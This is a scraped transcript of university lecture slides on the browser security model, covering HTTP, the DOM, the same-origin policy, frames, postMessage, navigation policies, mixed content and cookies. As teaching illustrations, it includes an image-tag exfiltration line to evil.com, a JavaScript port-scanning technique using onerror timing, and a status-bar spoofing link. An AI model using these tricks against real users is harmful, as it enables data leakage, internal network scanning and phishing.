browser security mode l - columbia universitysuman/6183_slides/web_sec.pdfn google study: [the ghost...
TRANSCRIPT
![Page 1: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/1.jpg)
Browser Security Model *original slides by prof. John Mitchell
![Page 2: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/2.jpg)
![Page 3: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/3.jpg)
Web vs System vulnerabilities
Decline in % web vulns since 2009 n 49% in 2010 -> 37% in 2011. n Big decline in SQL Injection vulnerabilities
XSS peak
![Page 4: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/4.jpg)
Reported Web Vulnerabilities "In the Wild"
Data from aggregator and validator of NVD-reported vulnerabilities
![Page 5: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/5.jpg)
![Page 6: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/6.jpg)
Web application vulnerabilities
![Page 7: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/7.jpg)
Five lectures on Web security
Browser security model n The browser as an OS and execution platform n Protocols, isolation, communication, …
Web application security n Application pitfalls and defenses
Content security policies n Additional mechanisms for sandboxing and security
Authentication and session management n How users authenticate to web sites n Browser-server mechanisms for managing state
HTTPS: goals and pitfalls n Network issues and browser protocol handling
This two-week section could fill an entire course
![Page 8: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/8.jpg)
Web programming poll
Familiar with basic html? Developed a web application using: n Apache? PHP? Ruby? n Python? SQL? n JavaScript? CSS? n JSON?
Know about: n postMessage? NaCL? Webworkers? CSP? n WebView?
Resource: http://www.w3schools.com/
![Page 9: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/9.jpg)
Goals of web security
Safely browse the web n Users should be able to visit a variety of web sites,
without incurring harm: w No stolen information w Site A cannot compromise session at Site B
Support secure web applications n Applications delivered over the web should be able
to achieve the same security properties as stand-alone applications
![Page 10: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/10.jpg)
Web Attacker
Sets up malicious site visited by
victim; no control of network
Alice
System
Web security threat model
![Page 11: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/11.jpg)
Network Attacker Intercepts and controls network communication
Alice
System
Network security threat model
![Page 12: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/12.jpg)
Web Attacker
Alice
System
Network Attacker
Alice
System
![Page 13: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/13.jpg)
Web Threat Models
Web attacker n Control attacker.com n Can obtain SSL/TLS certificate for attacker.com n User visits attacker.com
w Or: runs attacker’s Facebook app, etc.
Network attacker n Passive: Wireless eavesdropper n Active: Evil router, DNS poisoning
Malware attacker n Attacker escapes browser isolation mechanisms
and run separately under control of OS
![Page 14: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/14.jpg)
Malware attacker
Browsers may contain exploitable bugs n Often enable remote code execution by web sites n Google study: [the ghost in the browser 2007]
w Found Trojans on 300,000 web pages (URLs) w Found adware on 18,000 web pages (URLs)
Even if browsers were bug-free, still lots of vulnerabilities on the web n All of the vulnerabilities on previous graph: XSS,
SQLi, CSRF, …
NOT OUR FOCUS IN THIS PART OF COURSE
![Page 15: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/15.jpg)
Outline
Http Rendering content Isolation Communication Navigation Security User Interface Cookies Frames and frame busting
![Page 16: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/16.jpg)
HTTP
![Page 17: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/17.jpg)
URLs
Global identifiers of network-retrievable documents
Example: http://stanford.edu:81/class?name=cs155#homework
Special characters are encoded as hex: n %0A = newline n %20 or + = space, %2B = + (special exception)
Protocol
Hostname Port Path
Query
Fragment
![Page 18: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/18.jpg)
GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats
HTTP Request Method File HTTP version Headers
Data – none for GET Blank line
GET : no side effect POST : possible side effect
![Page 19: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/19.jpg)
HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML>
HTTP Response HTTP version Status code Reason phrase Headers
Data
Cookies
![Page 20: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/20.jpg)
RENDERING CONTENT
![Page 21: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/21.jpg)
Rendering and events
Basic browser execution model n Each browser window or frame
w Loads content w Renders it
n Processes HTML and scripts to display page n May involve images, subframes, etc.
w Responds to events
Events can be n User actions: OnClick, OnMouseover n Rendering: OnLoad, OnBeforeUnload n Timing: setTimeout(), clearTimeout()
![Page 22: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/22.jpg)
Example
Source: http://www.w3schools.com/js/js_output.asp
<!DOCTYPE html> <html> <body> <h1>My First Web Page</h1> <p>My first paragraph.</p> <button onclick="document.write(5 + 6)">Try it</button> </body> </html>
![Page 23: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/23.jpg)
Document Object Model (DOM) Object-oriented interface used to read and write docs n web page in HTML is structured data n DOM provides representation of this hierarchy
Examples n Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
n Methods: document.write(document.referrer)
Includes Browser Object Model (BOM) n window, document, frames[], history, location,
navigator (type and version of browser)
![Page 24: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/24.jpg)
Example
Source: http://www.w3schools.com/js/js_output.asp
<!DOCTYPE html> <html> <body> <h1>My First Web Page</h1> <p>My First Paragraph</p> <p id="demo"></p> <script> document.getElementById("demo").innerHTML = 5 + 6; </script> </body> </html>
![Page 25: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/25.jpg)
Changing HTML using Script, DOM
Some possibilities n createElement(elementName) n createTextNode(text) n appendChild(newChild) n removeChild(node)
Example: Add a new list item:
var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext)
<ul id="t1"> <li> Item 1 </li> </ul>
HTML
![Page 26: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/26.jpg)
HTML Image Tags
26
Displays this nice picture è Security issues?
<html> … <p> … </p> … <img src=“http://example.com/sunset.gif” height="50" width="100"> … </html>
Basic web functionality
![Page 27: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/27.jpg)
Image tag security issues
27
Communicate with other sites n <img src=“http://evil.com/pass-local-
information.jpg?extra_information”> Hide resulting image n <img src=“ … ” height=“1" width=“1">
Spoof other sites n Add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
Q: what threat model are we talking about here?
![Page 28: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/28.jpg)
JavaScript onError
Basic function n Triggered when error occurs loading a document
or an image
Example
n Runs onError handler if image does not exist and cannot
load
<img src="image.gif" onerror="alert('The image could not be loaded.')“ >
http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
![Page 29: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/29.jpg)
JavaScript timing
Sample code
n When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler.
<html><body><img id="test" style="display: none"> <script> var test = document.getElementById(’test’); var start = new Date(); test.onerror = function() { var end = new Date(); alert("Total time: " + (end - start)); } test.src = "http://www.example.com/page.html"; </script> </body></html>
Basic web functionality
![Page 30: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/30.jpg)
Port scanning behind firewall
JavaScript can: n Request images from internal IP addresses
w Example: <img src=“192.168.0.4:8080”/>
n Use timeout/onError to determine success/failure n Fingerprint webapps using known image names
Server
Malicious Web page
Firewall
1) “show me dancing pigs!”
2) “check this out”
Browser
scan
scan scan 3) port scan results
Security consequence
![Page 31: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/31.jpg)
Remote scripting Goal n Exchange data between a client-side app running in a browser and
server-side app, without reloading page
Methods n Java Applet/ActiveX control/Flash
w Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
n XML-RPC w open, standards-based technology that requires XML-RPC libraries on
server and in your client-side code.
n Simple HTTP via a hidden IFRAME w IFRAME with a script on your web server (or database of static HTML files) is by
far the easiest of the three remote scripting options
See: http://developer.apple.com/internet/webcontent/iframe.html
Important Point: A page can maintain bi-directional communication with browser (until user closes/quits)
![Page 32: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/32.jpg)
Simple remote scripting example
<script type="text/javascript"> function handleResponse() { alert('this function is called from server.html') } </script> <iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html"> </iframe> <a href="server.html" target="RSIFrame">make RPC call</a>
<script type="text/javascript"> window.parent.handleResponse() </script>
RPC can be done silently in JavaScript, passing and receiving arguments
server.html: another page on same server, could be server.php, etc
client.html: “RPC” by passing arguments to server.html in query string
![Page 33: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/33.jpg)
ISOLATION
![Page 34: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/34.jpg)
Frame and iFrame
Window may contain frames from different sources n Frame: rigid division as part of frameset n iFrame: floating inline frame
iFrame example
Why use frames? n Delegate screen area to content from another source n Browser provides isolation based on frames n Parent may work even if frame is broken
<iframe src="hello.html" width=450 height=100> If you can see this, your browser doesn't understand IFRAME. </iframe>
![Page 35: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/35.jpg)
Windows Interact
35
![Page 36: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/36.jpg)
Analogy
Operating system Primitives n System calls n Processes n Disk
Principals: Users n Discretionary access control
Vulnerabilities n Buffer overflow n Root exploit
Web browser Primitives n Document object model n Frames n Cookies / localStorage
Principals: “Origins” n Mandatory access control
Vulnerabilities n Cross-site scripting n Cross-site request forgery n Cache history attacks n …
![Page 37: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/37.jpg)
Policy Goals
Safe to visit an evil web site
Safe to visit two pages at the same time n Address bar distinguishes them
Allow safe delegation
![Page 38: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/38.jpg)
Browser security mechanism
Each frame of a page has an origin n Origin = protocol://host:port
Frame can access its own origin n Network access, Read/write DOM, Storage (cookies)
Frame cannot access data associated with a different origin
A
A
B
B
A
![Page 39: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/39.jpg)
Components of browser security policy
Frame-Frame relationships n canScript(A,B)
w Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
n canNavigate(A,B) w Can Frame A change the origin of content for Frame B?
Frame-principal relationships n readCookie(A,S), writeCookie(A,S)
w Can Frame A read/write cookies from site S?
See https://code.google.com/p/browsersec/wiki/Part1 https://code.google.com/p/browsersec/wiki/Part2
![Page 40: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/40.jpg)
Library import excluded from SOP <scriptsrc=https://seal.verisign.com/getseal?
host_name=a.com></script> • Script has privileges of imported page, NOT source server. • Can script other pages in this origin, load more scripts • Other forms of importing
VeriSign
![Page 41: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/41.jpg)
Domain Relaxation
Origin: scheme, host, (port), hasSetDomain Try document.domain=document.domain
www.facebook.com
www.facebook.com www.facebook.com chat.facebook.com
chat.facebook.com
facebook.com facebook.com
![Page 42: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/42.jpg)
Additional mechanisms
Cross-originnetworkrequests
Access-Control-Allow-Origin:<listofdomains>
Access-Control-Allow-Origin:*
Cross-originclientsidecommunica<on
Client-sidemessagingvianaviga<on(oldbrowsers)
postMessage(modernbrowsers)
Site B Site A
Site A context Site B context
![Page 43: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/43.jpg)
COMMUNICATION
![Page 44: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/44.jpg)
window.postMessage API for inter-frame communication n Supported in standard browsers
n A network-like channel between frames
Add a contact
Share contacts
![Page 45: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/45.jpg)
postMessage syntax frames[0].postMessage("Attackatdawn!","http://b.com/");
window.addEventListener("message",function(e){if(e.origin=="http://a.com"){...e.data...}},false);
Facebook Anecdote
Attack at dawn!
![Page 46: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/46.jpg)
Why include “targetOrigin”?
What goes wrong? frames[0].postMessage("Attackatdawn!");
Messages sent to frames, not principals
n When would this happen?
46
![Page 47: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/47.jpg)
NAVIGATION
47
![Page 48: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/48.jpg)
A Guninski Attack
awglogin
window.open("https://attacker.com/","awglogin");
![Page 49: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/49.jpg)
What should the policy be?
49
Child
Sibling
Descendant
Frame Bust
![Page 50: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/50.jpg)
Browser PolicyIE6(default) PermissiveIE6(op<on) ChildIE7(noFlash) DescendantIE7(withFlash) PermissiveFirefox2 WindowSafari3 PermissiveOpera9 Window
HTML5 Child
Legacy Browser Behavior
![Page 51: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/51.jpg)
Window Policy Anomaly
top.frames[1].location="http://www.attacker.com/...";top.frames[2].location="http://www.attacker.com/...";
...
![Page 52: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/52.jpg)
Browser PolicyIE6(default) PermissiveIE6(op<on) ChildIE7(noFlash) DescendantIE7(withFlash) PermissiveFirefox2 WindowSafari3 PermissiveOpera9 Window
HTML5 Child
Legacy Browser Behavior
![Page 53: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/53.jpg)
Browser PolicyIE7(noFlash) DescendantIE7(withFlash) DescendantFirefox3 DescendantSafari3 DescendantOpera9 (manypolicies)HTML5 Descendant
Adoption of Descendant Policy
![Page 54: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/54.jpg)
SECURITY USER INTERFACE When is it safe to type my password?
![Page 55: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/55.jpg)
Safe to type your password?
55
![Page 56: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/56.jpg)
Safe to type your password?
56
![Page 57: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/57.jpg)
Safe to type your password?
57
![Page 58: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/58.jpg)
Safe to type your password?
58
???
???
![Page 59: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/59.jpg)
Safe to type your password?
59
![Page 60: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/60.jpg)
Mixed Content: HTTP and HTTPS
Problem n Page loads over HTTPS, but has HTTP content n Network attacker can control page
IE: displays mixed-content dialog to user n Flash files over HTTP loaded with no warning (!) n Note: Flash can script the embedding page
Firefox: red slash over lock icon (no dialog) n Flash files over HTTP do not trigger the slash
Safari: does not detect mixed content
Dan will talk about this later….
![Page 61: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/61.jpg)
Mixed Content: HTTP and HTTPS silly dialogs
![Page 62: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/62.jpg)
Mixed content and network attacks
banks: after login all content over HTTPS n Developer error: Somewhere on bank site write
<script src=http://www.site.com/script.js> </script>
n Active network attacker can now hijack any session
Better way to include content:
<script src=//www.site.com/script.js> </script>
n served over the same protocol as embedding page
![Page 63: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/63.jpg)
Lock Icon 2.0
Extended validation (EV) certs
• Prominent security indicator for EV certificates
• note: EV site loading content from non-EV site does not trigger mixed content warning
![Page 64: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/64.jpg)
Finally: the status Bar
Trivially spoofable
<a href=“http://www.paypal.com/” onclick=“this.href = ‘http://www.evil.com/’;”>
PayPal</a>
![Page 65: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/65.jpg)
COOKIES: CLIENT STATE
65
![Page 66: Browser Security Mode l - Columbia Universitysuman/6183_slides/web_sec.pdfn Google study: [the ghost in the browser 2007] w Found Trojans on 300,000 web pages (URLs) w Found adware](https://reader035.vdocuments.site/reader035/viewer/2022071510/612e48371ecc51586942b714/html5/thumbnails/66.jpg)
Cookies
Used to store state on user’s machine
Browser Server
POST …
HTTP Header: Set-cookie: NAME=VALUE ;
domain = (who can read) ; expires = (when expires) ; secure = (only over SSL)
Browser Server POST …
Cookie: NAME = VALUE
HTTP is stateless protocol; cookies add state
If expires=NULL: this session only
